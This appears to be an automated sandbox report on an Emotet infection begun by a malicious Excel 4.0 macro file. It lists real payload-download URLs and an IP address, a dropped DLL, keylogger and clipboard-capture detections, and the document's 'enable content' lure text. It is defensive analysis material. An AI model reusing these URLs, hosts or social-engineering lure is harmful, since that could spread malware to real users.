Source: powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://thaireportchannel.com/wp-includes/KaWZp0odkEO/PE3
Source: powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.690900197.000000000380B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: C:\Windows\System32\mshta.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\se[1].htm Jump to behavior
Source: unknown DNS traffic detected: queries for: kuyporn.com
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10012C30 _memset,connect,_strcat,send,recv, 9_2_10012C30
Source: global traffic HTTP traffic detected: GET /qqw/aas/se.html HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 91.240.118.168Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /qqw/aas/se.png HTTP/1.1Host: 91.240.118.168Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wp-content/XSs5/ HTTP/1.1Host: kuyporn.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wp-admin/vzOG/ HTTP/1.1Host: jeffreylubin.igclout.comConnection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.168
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.168
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.168
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.168
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.168
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.168
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.168
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.168
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.168
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.168
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.168
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.168
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.168
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.168
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.168
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.168
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.168
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.168
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.168
Source: mshta.exe, 00000004.00000003.430703152.000000000031C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.454494947.000000000031C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
Source: mshta.exe, 00000004.00000003.430703152.000000000031C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.454494947.000000000031C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)

Key, Mouse, Clipboard, Microphone and Screen Capturing
barindex
Potential key logger detected (key state polling based)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1001B43F GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA, 9_2_1001B43F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1001B43F GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA, 11_2_1001B43F
Creates a window with clipboard capturing capabilities
Source: C:\Windows\System32\mshta.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior

E-Banking Fraud
barindex
Yara detected Emotet
Source: Yara match File source: 17.2.rundll32.exe.2a0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2810000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.rundll32.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.140000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2f40000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2380000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2380000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.rundll32.exe.230000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2ed0000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.380000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.25f0000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2320000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.23e0000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.rundll32.exe.180000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.910000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.3d0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2e80000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.a40000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.380000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.rundll32.exe.180000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2f30000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.a70000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.180000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.5f0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2670000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.180000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2860000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.25c0000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2590000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.25f0000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2410000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2f40000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2e40000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.7a0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.230000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.24d0000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.a60000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.230000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2350000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.28e0000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.26b0000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.rundll32.exe.240000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2280000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.200000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2e50000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.3d0000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2ed0000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.820000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.26b0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2e20000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.31d0000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.8a0000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2fd0000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.ae0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.1d0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.23d0000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.910000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2960000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.220000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2250000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2eb0000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2730000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.220000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.1b0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.3170000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.a40000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.170000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.23d0000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2350000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.770000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.rundll32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.7a0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.ae0000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.370000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.a60000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2f30000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2e40000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.8e0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.27a0000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2960000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.23e0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2e70000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.3d0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.28e0000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.370000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.8e0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2590000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.220000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.140000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.22b0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.22b0000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.910000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.27a0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2e50000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.rundll32.exe.10000000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000C.00000002.574709897.0000000000230000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.522412460.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.574966326.0000000000911000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.521968966.0000000000400000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.521762770.0000000000221000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.575355954.00000000024D1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.682108397.0000000000231000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.522161075.0000000002381000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.522361954.0000000002861000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.522256343.0000000002731000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.673081131.00000000002A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.616094913.00000000003D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.577991543.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.522563448.0000000002E71000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.522208158.00000000026B0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.575698621.0000000002671000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.675215228.0000000002E21000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.675330890.0000000002E81000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.677230667.0000000010001000.00000020.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.522291162.00000000027A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.575069937.0000000002281000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.575241988.0000000002381000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.575278324.00000000023D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.678452410.0000000000241000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.524549461.0000000000180000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.673490791.0000000002251000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.616750004.0000000002E40000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.616484887.0000000000AE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.687313669.0000000010001000.00000020.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.616301764.00000000008A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.673601215.0000000002811000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.675278836.0000000002E50000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.616955117.0000000002F40000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.673042649.0000000000220000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.577507576.0000000000380000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.616430850.0000000000A71000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.616392195.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.521709838.00000000001A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.615957746.00000000001A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.521942436.00000000003D1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.678978438.0000000010001000.00000020.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.525704176.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.678388304.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.673313788.00000000007A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.521853368.0000000000370000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.616649136.0000000002590000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.618439586.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.575484750.00000000025F0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.575139258.0000000002321000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.675083188.0000000002960000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.575185069.0000000002350000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.615997372.00000000001D1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.522595880.0000000002ED0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.616558132.0000000002411000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.616683416.00000000025C1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.575020499.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.616861944.0000000002EB1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.617100945.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.673429165.0000000000910000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.471313951.0000000000140000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.524627088.00000000001B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.522683360.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.577775644.00000000005F1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.574936921.00000000008E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.522655348.0000000003171000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.575098711.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.575908934.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.675391959.0000000002F30000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.681991915.0000000000180000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.673370884.0000000000821000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.617022562.0000000002FD1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.618251514.0000000000201000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.574901913.0000000000771000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.673563319.00000000023E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.677112650.00000000031D1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.618216688.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\ProgramData\QWER.dll, type: DROPPED

System Summary
barindex
Found malicious Excel 4.0 Macro
Source: DETAILS-145.xls Macro extractor: Sheet: Macro1 contains: mshta
Source: DETAILS-145.xls Macro extractor: Sheet: Macro1 contains: mshta
Malicious sample detected (through community Yara rule)
Source: DETAILS-145.xls, type: SAMPLE Matched rule: Detects OLE Excel 4 Macros documents acting as downloaders Author: ditekSHen
Source: C:\Users\user\Desktop\DETAILS-145.xls, type: DROPPED Matched rule: Detects OLE Excel 4 Macros documents acting as downloaders Author: ditekSHen
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 16 17 18 19 20 21 22
Source: Screenshot number: 4 Screenshot OCR: DOCUMENT IS PROTECTED. 10 11 12 13 Previewing is not available for protected documents. 14 15
Source: Screenshot number: 4 Screenshot OCR: protected documents. 14 15 You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to pre
Source: Screenshot number: 4 Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 16 17 18 19 20 21 22 23 24 25 26 27 2
Source: Document image extraction number: 0 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 0 Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 0 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 0 Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1 Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 1 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 1 Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Source: Screenshot number: 8 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 16 17 18 19 20 21 22 G
Source: Screenshot number: 8 Screenshot OCR: DOCUMENT IS PROTECTED. 10 11 12 13 , , Previewing is not available for protected documents. 14
Source: Screenshot number: 8 Screenshot OCR: protected documents. 14 15 You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to pre
Source: Screenshot number: 8 Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 16 17 18 19 20 21 22 G) I I 23 24 25 26
Document contains OLE streams with names of living off the land binaries
Source: DETAILS-145.xls Stream path 'Workbook' : ........ZO..........................\.p....xXx B.....a.........=.............................................=........p.08.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.*.h...6...........C.a.l.i.b.r.i. .L.i.g.h.t.1...,...6...........C.a.l.i.b.r.i.1.......6...........C.a.l.i.b.r.i.1.......6...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......<...........C.a.l.i.b.r.i.1.......>...........C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................A.r.i.a.l.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......9...........C.a.l.i.b.r.i...3......#.,.#.#.0.\. .".. ".;.\.-.#.,.#.#.0.\. .".. "...=......#.,.#.#.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0.\. .".. "...?......#.,.#.#.0...0.0.\. .".. ".;.\.-.#.,.#.#.0...0.0.\. .".. "...I..."..#.,.#.#.0...0.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0...0.0.\. .".. "...q.*.6.._.-.*. .#.,.#.#.0.\. .".. "._.-.;.\.-.*. .#.,.#.#.0.\. .".. "._.-.;._.-.*. .".-.".\. .".. "._.-.;._.-.@._.-...,.).'.._-* #,##0_-;\-* #,##0_-;_-* "-"_-;_-@_-....,.>.._.-.*. .#.,.#.#.0...0.0.\. .".. "._.-.;.\.-.*. .#.,.#.#.0...0.0.\. .".. "._.-.;._.-.*. .".-.".?.?.\. .".. "._.-.;._.-.@._.-...4.+./.._-* #,##0.00_-;\-* #,##0.00_-;_-* "-"??_-;_-@_-..?...:.._("$"* #,##0.00_);_("$"* \(#,##0.00\);_("$"* "-"??_);_(@_).......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .....
